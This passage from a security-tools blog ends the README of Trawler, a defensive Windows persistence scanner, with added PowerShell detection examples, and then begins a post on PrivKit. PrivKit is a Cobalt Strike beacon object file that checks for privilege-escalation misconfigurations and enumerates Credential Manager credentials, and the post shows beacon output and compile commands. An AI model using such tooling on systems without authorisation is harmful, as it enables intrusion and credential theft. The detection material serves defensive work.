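<p dir="auto">Hosts that cannot be reached are reported with a warning and skipped rather than aborting the run; the merged CSV keeps a Host column so a detection that appears on a single machine stands out from one present fleet-wide, which is usually the first triage question.</p>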
<h2 dir="auto" tabindex="-1">Drive ReTargeting</h2>
<p dir="auto">Often during an investigation, analysts may end up mounting a new drive that represents an imaged Windows device - Trawler now partially supports scanning these mounted drives through the use of the '-drivetarget' parameter.</p>
<p dir="auto">At runtime, Trawler will re-target temporary script-level variables for use in checking file-based artifacts and also will attempt to load relevant Registry Hives (HKLM\SOFTWARE, HKLM\SYSTEM, NTUSER.DATs, USRCLASS.DATs) underneath HKLM/HKU and prefixed by 'ANALYSIS_'. Trawler will also attempt to unload these temporarily loaded hives upon script completion.</p>
<p dir="auto">As an example, if you have an image mounted at a location such as 'F:\Test' which contains the NTFS file system ('F:\Test\Windows', 'F:\Test\Users', etc.) then you can invoke trawler as shown below:</p>
<div><pre><code>.\trawler.ps1 -drivetarget "F:\Test"</code></pre></div>
<p dir="auto">Please note that since trawler attempts to load the registry hive files from the drive in question, mapping a UNC path to a live remote device will NOT work as those files will not be accessible due to system locks. I am working on an approach which will handle live remote devices, stay tuned.</p>
<h3 dir="auto" tabindex="-1">What is not inspected when drive retargeting?</h3>
<ul dir="auto">
<li>Running Processes</li>
<li>Network Connections</li>
<li>'Phantom' DLLs</li>
<li>WMI Consumers (Being worked on)</li>
<li>BITS Jobs (Being worked on)</li>
<li>Certificate Parsing (Being worked on)</li>
</ul>
<p dir="auto">Most other checks will function fine because they are based entirely on reading registry hives or file-based artifacts (or can be converted to do so, such as directly reading Task XML as opposed to using built-in cmdlets).</p>
<p dir="auto">Any limitations in checks when doing drive-retargeting will be discussed more fully in the GitHub Wiki.</p>
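<p dir="auto">An added example (not Trawler's own code) of the offline-hive technique the Drive ReTargeting section describes: the mounted image's SOFTWARE hive is loaded under HKLM with an 'ANALYSIS_' prefix, the Run/RunOnce autostart values are read from it, each command's drive letter is re-targeted to the mount point so the referenced file can be checked inside the image, and the hive is unloaded afterwards. It assumes an elevated PowerShell session and the 'F:\Test' mount point used in the text; the function name, mount name and output fields are this example's own.</p>

```powershell
# Added example, not Trawler's own code. Assumes an elevated PowerShell session, an image
# mounted at F:\Test (the path used in the text) and that nothing else holds the hive open.
# The function name, mount name and output fields are this example's own.

function Get-OfflineRunKeys {
    param(
        [Parameter(Mandatory)] [string] $DriveTarget,   # e.g. F:\Test
        [string] $MountName = 'ANALYSIS_SOFTWARE'       # hive lands at HKLM\ANALYSIS_SOFTWARE
    )

    $hiveFile = Join-Path $DriveTarget 'Windows\System32\config\SOFTWARE'
    if (-not (Test-Path -LiteralPath $hiveFile)) { throw "Hive not found: $hiveFile" }

    # reg.exe maps the offline hive file into the live registry under HKLM\<MountName>.
    reg.exe load "HKLM\$MountName" $hiveFile | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "reg load failed for $hiveFile (exit $LASTEXITCODE)" }

    try {
        foreach ($sub in 'Run', 'RunOnce') {
            $key = "HKLM:\$MountName\Microsoft\Windows\CurrentVersion\$sub"
            if (-not (Test-Path -LiteralPath $key)) { continue }
            $item = Get-Item -LiteralPath $key
            foreach ($valueName in $item.GetValueNames()) {
                $cmd = [string] $item.GetValue($valueName)
                # First token of the command line: a quoted path, or everything up to the first space.
                $exe = if ($cmd -match '^"([^"]+)"') { $Matches[1] } else { ($cmd -split '\s+')[0] }
                # The imaged system's C: now lives under the mount point, so re-target the drive
                # letter. Commands using %SystemRoot% and similar are left as-is and show as not found.
                $inImage = $exe -replace '^[A-Za-z]:', $DriveTarget
                [pscustomobject]@{
                    Key           = "$sub\$valueName"
                    Command       = $cmd
                    ExistsInImage = Test-Path -LiteralPath $inImage
                }
            }
        }
    }
    finally {
        # The registry provider may still hold handles on the hive; release them before unloading,
        # otherwise reg unload fails with "access denied" and the hive stays mounted.
        [gc]::Collect()
        [gc]::WaitForPendingFinalizers()
        reg.exe unload "HKLM\$MountName" | Out-Null
        if ($LASTEXITCODE -ne 0) { Write-Warning "reg unload failed; run: reg.exe unload HKLM\$MountName" }
    }
}

Get-OfflineRunKeys -DriveTarget 'F:\Test' | Format-Table -AutoSize
```

<p dir="auto">The same pattern (load under a prefixed name, read, unload in a finally block) extends to the SYSTEM hive for service ImagePath values and to each user's NTUSER.DAT under HKU, which is exactly the set of hives the text says Trawler loads. An entry whose re-targeted path does not exist in the image is not automatically malicious, but it is the case the analyst should look at first.</p>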
<h2 dir="auto" tabindex="-1">Example Images </h2>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP02RuSFcrJo4DP9qTjU6lmx5pLNxho6hA6GRckjuljDcP6DFx57IzrF7laCn7x7U4jj2Y7p8Us18NN9QH2G23FsrBYr4Q2Is2bPckI7Tx3nAsdutpu5WnUbnHWJurR3r06CsphpCWBNljKrJqJsRx7nm0tVVA_pbWpz-8D0doCs6-7qAWcGXQiyQYzkx5/s1679/Trawler_2_sample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="402" data-original-width="1679" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP02RuSFcrJo4DP9qTjU6lmx5pLNxho6hA6GRckjuljDcP6DFx57IzrF7laCn7x7U4jj2Y7p8Us18NN9QH2G23FsrBYr4Q2Is2bPckI7Tx3nAsdutpu5WnUbnHWJurR3r06CsphpCWBNljKrJqJsRx7nm0tVVA_pbWpz-8D0doCs6-7qAWcGXQiyQYzkx5/w640-h154/Trawler_2_sample.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2msxdZAOo5ZZBZOgOl--fOKMnkCvOMVp1MpCOXaypAYhiZ05B6tUfKusjXWSLNeLGK8Le97KBs76h6WCAtIksR0zeXQj0Ck_8NDRb8YOjsC0oo15Z8NA-stWNsazL0gBaJ2PAOHac_-q63wDnQMljzao9HRXvaIlXQfUDadgv4GmBIfm8n8aMTTHeZsHs/s2286/Trawler_3_sample2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1200" data-original-width="2286" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2msxdZAOo5ZZBZOgOl--fOKMnkCvOMVp1MpCOXaypAYhiZ05B6tUfKusjXWSLNeLGK8Le97KBs76h6WCAtIksR0zeXQj0Ck_8NDRb8YOjsC0oo15Z8NA-stWNsazL0gBaJ2PAOHac_-q63wDnQMljzao9HRXvaIlXQfUDadgv4GmBIfm8n8aMTTHeZsHs/w640-h336/Trawler_3_sample2.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn7tF32cJFQ_6yXlKRDVdIBlFbkt9vJ0IHg52OW-79qFEJ6dlHah_eVhmHFVpMjgr7ls2UuF5uUsd__4LNwMzbTlZxYWnpcYRSzwImlfIyEiqlIYEabXnUGuuypp8pwGWNZi3SfGTMrVu0NztqBD15Q9fy9YWt0Kyscnh65ucxBYY6JZH4wfULqljQHJC9/s1853/Trawler_4_sample3.png" imageanchor="1" 
style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="299" data-original-width="1853" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn7tF32cJFQ_6yXlKRDVdIBlFbkt9vJ0IHg52OW-79qFEJ6dlHah_eVhmHFVpMjgr7ls2UuF5uUsd__4LNwMzbTlZxYWnpcYRSzwImlfIyEiqlIYEabXnUGuuypp8pwGWNZi3SfGTMrVu0NztqBD15Q9fy9YWt0Kyscnh65ucxBYY6JZH4wfULqljQHJC9/w640-h104/Trawler_4_sample3.png" width="640" /></a></div><p align="center" dir="auto"><span style="text-align: left;"> </span></p>
<h2 dir="auto" tabindex="-1">What is inspected?</h2>
<ul dir="auto">
<li>Scheduled Tasks</li>
<li>Users</li>
<li>Services</li>
<li>Running Processes</li>
<li>Network Connections</li>
<li>WMI Event Consumers (CommandLine/Script)</li>
<li>Startup Item Discovery</li>
<li>BITS Jobs Discovery</li>
<li>Windows Accessibility Feature Modifications</li>
<li>PowerShell Profile Existence</li>
<li>Office Addins from Trusted Locations</li>
<li>SilentProcessExit Monitoring</li>
<li>Winlogon Helper DLL Hijacking</li>
<li>Image File Execution Option Hijacking</li>
<li>RDP Shadowing</li>
<li>UAC Setting for Remote Sessions</li>
<li>Print Monitor DLLs</li>
<li>LSA Security and Authentication Package Hijacking</li>
<li>Time Provider DLLs</li>
<li>Print Processor DLLs</li>
<li>Boot/Logon Active Setup</li>
<li>User Initialization Logon Script Hijacking</li>
<li>ScreenSaver Executable Hijacking</li>
<li>Netsh DLLs</li>
<li>AppCert DLLs</li>
<li>AppInit DLLs</li>
<li>Application Shimming</li>
<li>COM Object Hijacking</li>
<li>LSA Notification Hijacking</li>
<li>'Office test' Usage</li>
<li>Office GlobalDotName Usage</li>
<li>Terminal Services DLL Hijacking</li>
<li>Autodial DLL Hijacking</li>
<li>Command AutoRun Processor Abuse</li>
<li>Outlook OTM Hijacking</li>
<li>Trust Provider Hijacking</li>
<li>LNK Target Scanning (Suspicious Terms, Multiple Extensions, Multiple EXEs)</li>
<li>'Phantom' Windows DLL Names loaded into running process (eg. un-signed WptsExtensions.dll)</li>
<li>Scanning Critical OS Directories for Unsigned EXEs/DLLs</li>
<li>Un-Quoted Service Path Hijacking</li>
<li>PATH Binary Hijacking</li>
<li>Common File Association Hijacks and Suspicious Keywords</li>
<li>Suspicious Certificate Hunting</li>
<li>GPO Script Discovery/Scanning</li>
<li>NLP Development Platform DLL Overrides</li>
<li>AeDebug/.NET/Script/Process/WER Debug Replacements</li>
<li>Explorer 'Load'</li>
<li>Windows Terminal startOnUserLogin Hijacks</li>
<li>App Path Mismatches</li>
<li>Service DLL/ImagePath Mismatches</li>
<li>GPO Extension DLLs</li>
<li>Potential COM Hijacks</li>
<li>Non-Standard LSA Extensions</li>
<li>DNSServerLevelPluginDll Presence</li>
<li>Explorer\MyComputer Utility Hijack</li>
<li>Terminal Services InitialProgram Check</li>
<li>RDP Startup Programs</li>
<li>Microsoft Telemetry Commands</li>
<li>Non-Standard AMSI Providers</li>
<li>Internet Settings LUI Error DLL</li>
<li>PeerDist\Extension DLL</li>
<li>ErrorHandler.CMD Checks</li>
<li>Built-In Diagnostics DLL</li>
<li>MiniDumpAuxiliary DLLs</li>
<li>KnownManagedDebugger DLLs</li>
<li>WOW64 Compatibility Layer DLLs</li>
<li>EventViewer MSC Hijack</li>
<li>Uninstall Strings Scan</li>
<li>PolicyManager DLLs</li>
<li>SEMgr Wallet DLL</li>
<li>WER Runtime Exception Handlers</li>
<li>HTML Help (.CHM)</li>
<li>Remote Access Tool Artifacts (Files, Directories, Registry Keys)</li>
<li>ContextMenuHandler DLL Checks</li>
<li>Office AI.exe Presence</li>
<li>Notepad++ Plugins</li>
<li>MSDTC Registry Hijacks</li>
<li>Narrator DLL Hijack (MSTTSLocEnUS.DLL)</li>
<li>Suspicious File Location Checks</li>
</ul>
<p dir="auto">TODO</p>
<ul dir="auto">
<li>Add Analysis/Remediation Guidance to each detection in the GitHub Wiki (In-Progress)</li>
<li>Browser <a href="https://www.kitploit.com/search/label/Extension%20Analysis" target="_blank" title="Extension Analysis">Extension Analysis</a> (?)</li>
<li>RID Hijacking [<a href="https://www.ired.team/offensive-security/persistence/rid-hijacking" rel="nofollow" target="_blank" title="https://www.ired.team/offensive-security/persistence/rid-hijacking">https://www.ired.team/offensive-security/persistence/rid-hijacking</a>, <a href="https://pentestlab.blog/2020/02/12/persistence-rid-hijacking/" rel="nofollow" target="_blank" title="https://pentestlab.blog/2020/02/12/persistence-rid-hijacking/">https://pentestlab.blog/2020/02/12/persistence-rid-hijacking/</a>]</li>
<li>PowerAutomate Checks</li>
<li>ShadowPad Indicators [<a href="https://www.secureworks.com/research/shadowpad-malware-analysis" rel="nofollow" target="_blank" title="https://www.secureworks.com/research/shadowpad-malware-analysis">https://www.secureworks.com/research/shadowpad-malware-analysis</a>, <a href="https://www.hexacorn.com/blog/2023/02/25/beyond-good-ol-run-key-part-141/" rel="nofollow" target="_blank" title="https://www.hexacorn.com/blog/2023/02/25/beyond-good-ol-run-key-part-141/">https://www.hexacorn.com/blog/2023/02/25/beyond-good-ol-run-key-part-141/</a>]</li>
<li>OBS Startup Script Scanning [<a href="https://www.hexacorn.com/blog/2023/04/14/beyond-good-ol-run-key-part-142/" rel="nofollow" target="_blank" title="https://www.hexacorn.com/blog/2023/04/14/beyond-good-ol-run-key-part-142/">https://www.hexacorn.com/blog/2023/04/14/beyond-good-ol-run-key-part-142/</a>]</li>
<li>SQL <a href="https://www.kitploit.com/search/label/Server%20Management" target="_blank" title="Server Management">Server Management</a> Addins [<a href="https://www.hexacorn.com/blog/2019/09/28/beyond-good-ol-run-key-part-117/" rel="nofollow" target="_blank" title="https://www.hexacorn.com/blog/2019/09/28/beyond-good-ol-run-key-part-117/">https://www.hexacorn.com/blog/2019/09/28/beyond-good-ol-run-key-part-117/</a>]</li>
<li>AutoPlay Handler Inspection [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\Handlers]</li>
<li>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Pending\SPReviewEnabler</li>
<li>OCSetup [<a href="https://www.hexacorn.com/blog/2019/11/09/beyond-good-ol-run-key-part-122/" rel="nofollow" target="_blank" title="https://www.hexacorn.com/blog/2019/11/09/beyond-good-ol-run-key-part-122/">https://www.hexacorn.com/blog/2019/11/09/beyond-good-ol-run-key-part-122/</a>]</li>
<li>Review <a href="https://hijacklibs.net/#" rel="nofollow" target="_blank" title="https://hijacklibs.net/#">https://hijacklibs.net/#</a> for additional opportunities</li>
<li>Review <a href="https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows" rel="nofollow" target="_blank" title="https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows">https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows</a> for additional opportunities</li>
<li>Review <a href="https://silentrunners.org/launchpoints.html" rel="nofollow" target="_blank" title="https://silentrunners.org/launchpoints.html">https://silentrunners.org/launchpoints.html</a> for additional opportunities</li>
</ul>
<h2 dir="auto" tabindex="-1">MITRE Techniques Evaluated</h2>
<p dir="auto">Please be aware that some of these are (of course) more thoroughly detected than others - for example, we are not detecting all possible registry modifications but rather inspecting certain keys for obvious changes and using the generic MITRE technique "Modify Registry" where no other technique is applicable. For other items such as COM hijacking, we are inspecting all entries in the relevant registry section, checking them against 'known-good' patterns and bubbling up unknown or mismatched values, resulting in a much more complete detection surface for that particular technique.</p>
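<p dir="auto">An added example (not Trawler's own code) of the COM inspection approach just described: every CLSID's InprocServer32 value in HKLM and HKCU is read, compared against an optional golden-image snapshot and a set of known-good path patterns, and anything unknown or mismatched is bubbled up in the Name/Risk/Source/Technique/Metadata shape the README describes. The function name, the known-good patterns and the snapshot CSV layout (Key,Value columns) are assumptions of this example, not Trawler's.</p>

```powershell
# Added example, not Trawler's own code. Function name, known-good patterns and the
# snapshot CSV layout (Key,Value columns) are this example's assumptions. Reading
# HKLM/HKCU needs no elevation.

function Find-ComServerAnomalies {
    param([string] $SnapshotPath)   # optional golden-image allow-list (Key,Value CSV)

    # Directories where COM server DLLs live on a default install. Values are expanded before
    # matching, so %SystemRoot%\system32\foo.dll qualifies; matching is case-insensitive.
    $knownGood = @(
        '^' + [regex]::Escape([string] $env:SystemRoot) + '\\',
        '^' + [regex]::Escape([string] $env:ProgramFiles) + '\\',
        '^' + [regex]::Escape([string] ${env:ProgramFiles(x86)}) + '\\'
    ) | Where-Object { $_ -ne '^\\' }   # drop the x86 entry where that variable is unset

    $allow = @{}
    if ($SnapshotPath -and (Test-Path -LiteralPath $SnapshotPath)) {
        Import-Csv -LiteralPath $SnapshotPath | ForEach-Object { $allow[$_.Key] = $_.Value }
    }

    foreach ($root in 'HKLM:\SOFTWARE\Classes\CLSID', 'HKCU:\SOFTWARE\Classes\CLSID') {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        foreach ($clsid in Get-ChildItem -LiteralPath $root -ErrorAction SilentlyContinue) {
            $key = "$root\$($clsid.PSChildName)\InprocServer32"
            if (-not (Test-Path -LiteralPath $key)) { continue }
            $dll = (Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue).'(default)'
            if ([string]::IsNullOrWhiteSpace($dll)) { continue }

            $expanded = [Environment]::ExpandEnvironmentVariables($dll.Trim('"'))
            $reason = $null

            if ($allow.ContainsKey($key)) {
                # Key exists on the golden image: an identical value is expected, anything else is a mismatch.
                if ($allow[$key] -eq $dll) { continue }
                $reason = 'Value differs from golden-image snapshot'
            }
            elseif ($root -like 'HKCU:*' -and (Test-Path -LiteralPath "HKLM:\SOFTWARE\Classes\CLSID\$($clsid.PSChildName)")) {
                # Per-user entries take precedence over machine-wide ones for the same CLSID.
                $reason = 'HKCU entry overrides an HKLM CLSID'
            }
            elseif (-not ($knownGood | Where-Object { $expanded -match $_ })) {
                # Also catches bare file names, which resolve through the DLL search order.
                $reason = 'Server outside known-good directories'
            }
            elseif (-not (Test-Path -LiteralPath $expanded)) {
                # Whoever can create a file at that path later controls what the COM client loads.
                $reason = 'Referenced DLL does not exist'
            }

            if ($reason) {
                [pscustomobject]@{
                    Name      = 'COM InprocServer32 anomaly'
                    Risk      = if ($root -like 'HKCU:*') { 'High' } else { 'Medium' }
                    Source    = $key
                    Technique = 'T1546.015'
                    Metadata  = "Server=$dll; Reason=$reason"
                }
            }
        }
    }
}

Find-ComServerAnomalies | Sort-Object Risk, Source | Format-Table -AutoSize
```

<p dir="auto">Without a snapshot this produces noise on any host with third-party software outside Program Files; that is the trade-off the paragraph above describes, and passing <code>-SnapshotPath</code> with a CSV exported from the golden image is what removes it. The snapshot comparison is exact on both key and value, so a CLSID that exists on the image but now points somewhere else is still reported.</p>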
<ul dir="auto">
<li>T1037: Boot or Logon Initialization Scripts</li>
<li>T1037.001: Boot or Logon Initialization Scripts: Logon Script (Windows)</li>
<li>T1037.005: Boot or Logon Initialization Scripts: Startup Items</li>
<li>T1055.001: Process Injection: Dynamic-link Library Injection</li>
<li>T1059: Command and Scripting Interpreter</li>
<li>T1071: Application Layer Protocol</li>
<li>T1098: Account Manipulation</li>
<li>T1112: Modify Registry</li>
<li>T1053: Scheduled Task/Job</li>
<li>T1136: Create Account</li>
<li>T1137.001: Office Application Startup: Office Template Macros</li>
<li>T1137.002: Office Application Startup: Office Test</li>
<li>T1137.006: Office Application Startup: Add-ins</li>
<li>T1197: BITS Jobs</li>
<li>T1505.005: Server Software Component: Terminal Services DLL</li>
<li>T1543.003: Create or Modify System Process: Windows Service</li>
<li>T1546: Event Triggered Execution</li>
<li>T1546.001: Event Triggered Execution: Change Default File Association</li>
<li>T1546.002: Event Triggered Execution: Screensaver</li>
<li>T1546.003: Event Triggered Execution: Windows Management <a href="https://www.kitploit.com/search/label/Instrumentation" target="_blank" title="Instrumentation">Instrumentation</a> Event Subscription</li>
<li>T1546.007: Event Triggered Execution: Netsh Helper DLL</li>
<li>T1546.008: Event Triggered Execution: Accessibility Features</li>
<li>T1546.009: Event Triggered Execution: AppCert DLLs</li>
<li>T1546.010: Event Triggered Execution: AppInit DLLs</li>
<li>T1546.011: Event Triggered Execution: Application Shimming</li>
<li>T1546.012: Event Triggered Execution: Image File Execution Options Injection</li>
<li>T1546.013: Event Triggered Execution: PowerShell Profile</li>
<li>T1546.015: Event Triggered Execution: Component Object Model Hijacking</li>
<li>T1547.002: Boot or Logon Autostart Execution: Authentication Packages</li>
<li>T1547.003: Boot or Logon Autostart Execution: Time Providers</li>
<li>T1547.004: Boot or Logon Autostart Execution: Winlogon Helper DLL</li>
<li>T1547.005: Boot or Logon Autostart Execution: Security Support Provider</li>
<li>T1547.009: Boot or Logon Autostart Execution: Shortcut Modification</li>
<li>T1547.012: Boot or Logon Autostart Execution: Print Processors</li>
<li>T1547.014: Boot or Logon Autostart Execution: Active Setup</li>
<li>T1553: Subvert Trust Controls</li>
<li>T1553.004: Subvert Trust Controls: Install Root Certificate</li>
<li>T1556.002: Modify Authentication Process: Password Filter DLL</li>
<li>T1574: Hijack Execution Flow</li>
<li>T1574.007: Hijack Execution Flow: Path Interception by PATH Environment Variable</li>
<li>T1574.009: Hijack Execution Flow: Path Interception by Unquoted Path</li>
</ul>
<h2 dir="auto" tabindex="-1">References</h2>
<p dir="auto">This tool would not exist without the amazing InfoSec community - the most notable references I used are provided below.</p>
<ul dir="auto">
<li><a href="https://github.com/last-byte/PersistenceSniper" rel="nofollow" target="_blank" title="PersistenceSniper">PersistenceSniper</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0003/" rel="nofollow" target="_blank" title="MITRE ATT&CK">MITRE ATT&CK</a></li>
<li><a href="https://persistence-info.github.io/" rel="nofollow" target="_blank" title="Persistence Info GitHub">Persistence Info GitHub</a></li>
<li><a href="https://www.hexacorn.com/blog/2017/01/28/beyond-good-ol-run-key-all-parts/" rel="nofollow" target="_blank" title="Hexacorn - Persistence Series">Hexacorn - Persistence Series</a></li>
<li><a href="https://www.ired.team/" rel="nofollow" target="_blank" title="IRED">IRED</a></li>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings" rel="nofollow" target="_blank" title="PayloadsAllTheThings">PayloadsAllTheThings</a></li>
</ul>
<h2 dir="auto" tabindex="-1">More References</h2>
<ul dir="auto">
<li><a href="https://twitter.com/Laughing_Mantis/status/1645268114966470662" rel="nofollow" target="_blank" title="https://twitter.com/Laughing_Mantis/status/1645268114966470662">https://twitter.com/Laughing_Mantis/status/1645268114966470662</a></li>
<li><a href="https://shellz.club/posts/a-novel-method-for-bypass-ETW/" rel="nofollow" target="_blank" title="https://shellz.club/posts/a-novel-method-for-bypass-ETW/">https://shellz.club/posts/a-novel-method-for-bypass-ETW/</a></li>
<li><a href="https://pentestlab.blog/2023/03/20/persistence-service-control-manager/" rel="nofollow" target="_blank" title="https://pentestlab.blog/2023/03/20/persistence-service-control-manager/">https://pentestlab.blog/2023/03/20/persistence-service-control-manager/</a></li>
<li><a href="https://ristbs.github.io/2023/02/15/hijack-explorer-context-menu-for-persistence-and-fun.html" rel="nofollow" target="_blank" title="https://ristbs.github.io/2023/02/15/hijack-explorer-context-menu-for-persistence-and-fun.html">https://ristbs.github.io/2023/02/15/hijack-explorer-context-menu-for-persistence-and-fun.html</a></li>
<li><a href="https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/" rel="nofollow" target="_blank" title="https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/">https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/</a></li>
</ul>
<br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/joeavanzato/Trawler" rel="nofollow" target="_blank" title="Download Trawler">Download Trawler</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-69062264559153536752023-08-03T08:30:00.003-04:002023-08-03T08:30:00.134-04:00PrivKit - Simple Beacon Object File That Detects Privilege Escalation Vulnerabilities Caused By Misconfigurations On Windows OS<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhUuZJSO5HgKHDxtpT1g2u_BQda5hzIsSp1YjJULHZCocCr-A3VoEJ1VTFcqtVvv2BvPxPT3KescAdRA2bRwV93-Ri9DnmpSBpipFvc_mLkSZze8xSPPhhBblfTvkf30ne1vJ8w6XN1qJb3r08Uf5ycfFaSpBUvwDdLxlUKMuqQbKmDPkSEwSRHESTCS_kn"><img alt="" border="0" height="302" id="BLOGGER_PHOTO_ID_7262933010865800850" src="https://blogger.googleusercontent.com/img/a/AVvXsEhUuZJSO5HgKHDxtpT1g2u_BQda5hzIsSp1YjJULHZCocCr-A3VoEJ1VTFcqtVvv2BvPxPT3KescAdRA2bRwV93-Ri9DnmpSBpipFvc_mLkSZze8xSPPhhBblfTvkf30ne1vJ8w6XN1qJb3r08Uf5ycfFaSpBUvwDdLxlUKMuqQbKmDPkSEwSRHESTCS_kn=w640-h302" width="640" /></a></p><br /> <p dir="auto">PrivKit is a simple beacon object file that detects <a href="https://www.kitploit.com/search/label/Privilege%20Escalation" target="_blank" title="privilege escalation">privilege escalation</a> <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> caused by <a href="https://www.kitploit.com/search/label/Misconfigurations" target="_blank" title="misconfigurations">misconfigurations</a> on Windows OS.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">PrivKit detects following misconfigurations</h2> <div><pre><code> Checks for Unquoted Service Paths<br /> Checks for Autologon Registry Keys<br /> Checks for Always Install Elevated Registry Keys<br /> Checks for Modifiable Autoruns<br /> Checks 
for Hijackable Paths<br /> Enumerates <a href="https://www.kitploit.com/search/label/Credentials" target="_blank" title="Credentials">Credentials</a> From Credential Manager<br /> Looks for current Token Privileges<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Usage</h2> <div><pre><code>[03/20 00:51:06] beacon> privcheck<br />[03/20 00:51:06] [*] Priv Esc Check Bof by @merterpreter<br />[03/20 00:51:06] [*] Checking For Unquoted Service Paths..<br />[03/20 00:51:06] [*] Checking For Autologon Registry Keys..<br />[03/20 00:51:06] [*] Checking For Always Install Elevated Registry Keys..<br />[03/20 00:51:06] [*] Checking For Modifiable Autoruns..<br />[03/20 00:51:06] [*] Checking For Hijackable Paths..<br />[03/20 00:51:06] [*] Enumerating Credentials From Credential Manager..<br />[03/20 00:51:06] [*] Checking For Token Privileges..<br />[03/20 00:51:06] [+] host called home, sent: 10485 bytes<br />[03/20 00:51:06] [+] received output:<br />Unquoted Service Path Check Result: Vulnerable service path found: c:\program files (x86)\grasssoft\macro expert\MacroService.exe<br /></code></pre></div> <p dir="auto">Simply load the cna file and type "privcheck"<br /> If you want to compile by yourself you can use:<br /> <code>make all</code><br /> or <br /> <code>x86_64-w64-mingw32-gcc -c cfile.c -o ofile.o</code></p> <p dir="auto">If you want to look for just one misconf you can use object file with "inline-execute" for example<br /> <code> inline-execute /path/tokenprivileges.o</code></p> <p dir="auto" style="text-align: center;"><a href="https://user-images.githubusercontent.com/48562581/226249192-84da03d5-435a-4da0-a6e6-4c451d2403e4.PNG" rel="nofollow" target="_blank" title="PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS. 
(5)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhUuZJSO5HgKHDxtpT1g2u_BQda5hzIsSp1YjJULHZCocCr-A3VoEJ1VTFcqtVvv2BvPxPT3KescAdRA2bRwV93-Ri9DnmpSBpipFvc_mLkSZze8xSPPhhBblfTvkf30ne1vJ8w6XN1qJb3r08Uf5ycfFaSpBUvwDdLxlUKMuqQbKmDPkSEwSRHESTCS_kn"><img alt="" border="0" height="302" id="BLOGGER_PHOTO_ID_7262933010865800850" src="https://blogger.googleusercontent.com/img/a/AVvXsEhUuZJSO5HgKHDxtpT1g2u_BQda5hzIsSp1YjJULHZCocCr-A3VoEJ1VTFcqtVvv2BvPxPT3KescAdRA2bRwV93-Ri9DnmpSBpipFvc_mLkSZze8xSPPhhBblfTvkf30ne1vJ8w6XN1qJb3r08Uf5ycfFaSpBUvwDdLxlUKMuqQbKmDPkSEwSRHESTCS_kn=w640-h302" width="640" /></a></p> <p dir="auto" style="text-align: center;"><a href="https://user-images.githubusercontent.com/48562581/226249135-a2444998-8c4f-4783-9b60-726c887032e4.PNG" rel="nofollow" target="_blank" title="PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS. (6)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj5hd-qQTYGFw52FgK_0pVKkdyxGBQocZIkTtOUXRXEhAHM59uJYWVSOj1si9k3ADcVopYAcmEP7WVDfYKppTLgGmxSCDtj6XFVgYpgnUXu-ZtVxvlnmMwtQD7YE3NA1IhT-AmiK7OuwN38LgzMogCtYHXJljW-WtOk3-eN7t29m8E8On8mX1Fi9wdobpMW"><img alt="" border="0" height="322" id="BLOGGER_PHOTO_ID_7262933027784488050" src="https://blogger.googleusercontent.com/img/a/AVvXsEj5hd-qQTYGFw52FgK_0pVKkdyxGBQocZIkTtOUXRXEhAHM59uJYWVSOj1si9k3ADcVopYAcmEP7WVDfYKppTLgGmxSCDtj6XFVgYpgnUXu-ZtVxvlnmMwtQD7YE3NA1IhT-AmiK7OuwN38LgzMogCtYHXJljW-WtOk3-eN7t29m8E8On8mX1Fi9wdobpMW=w640-h322" width="640" /></a></p> <h2 dir="auto" tabindex="-1">Acknowledgement</h2> <p dir="auto">Mr.Un1K0d3r - Offensive Coding Portal <br /> <a href="https://mr.un1k0d3r.world/portal/" rel="nofollow" target="_blank" title="https://mr.un1k0d3r.world/portal/">https://mr.un1k0d3r.world/portal/</a></p> <p dir="auto">Outflank - C2-Tool-Collection<br /> <a href="https://github.com/outflanknl/C2-Tool-Collection" rel="nofollow" target="_blank" 
